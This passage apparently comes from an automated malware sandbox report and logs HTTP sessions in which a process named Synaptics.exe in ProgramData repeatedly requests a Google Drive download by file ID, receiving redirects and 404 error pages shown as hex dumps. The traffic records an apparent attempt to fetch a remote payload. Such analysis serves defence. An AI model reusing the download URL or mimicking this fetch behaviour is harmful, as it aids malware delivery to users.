                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="SaXZ3l3EjCsHvHEyLV2jZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:32 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.1149806142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:33 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:33 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-plgBhigCc3PEQjjQiJutyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.1149807142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:33 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:33 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-9OX9FqL5rb0OI_eWR3YQXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.1149819142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:35 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6cEp6pFPNl5Xa7sbX8jQxMNVDdyuC69z5W4yvVkqeGgtUDzo61WRggM6v2LE6QA2WJ12ccfLg
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:34 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-S35fU7U-5pXkSAM-iMVRkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:35 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2025-01-07 12:18:35 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 61 43 7a 69 71 57 46 41 6b 72 71 4d 59 41 46 56 62 4e 6a 39 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="saCziqWFAkrqMYAFVbNj9g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2025-01-07 12:18:35 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.1149818142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:34 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:34 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hxHSAdn0QHSghXsrFgrXRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.1149821142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:35 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4gW5qOzUKXqTTCjeQ9wP6y6xgQKpAZkIM6Tf_6Zi7Nqxir_6iS-NhQks6DFi9jBE9m
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:34 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-x90EqjtfPlIiA3yQNuK8rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:35 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:35 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 33 75 63 66 38 61 4e 70 2d 45 35 44 41 73 5a 47 74 43 75 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="q3ucf8aNp-E5DAsZGtCuKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:35 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.1149820142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:34 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:34 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5OwXIxM5mtlSthRzAlR4bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.1149828142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:35 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-RN0RaN8EMVPsAxRlbclgdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.1149829142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:36 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-QjZ9vTNUMxcDEnqFzAVN_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.1149830142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:36 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5AFEGbacIzpSAULCoPQkw8rQlP8j00jsK0afAf7paQz2DH7_4vaUPD3x2y83op_4BP
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:36 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-JnKr9rVpi7N8UzYKecQyFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
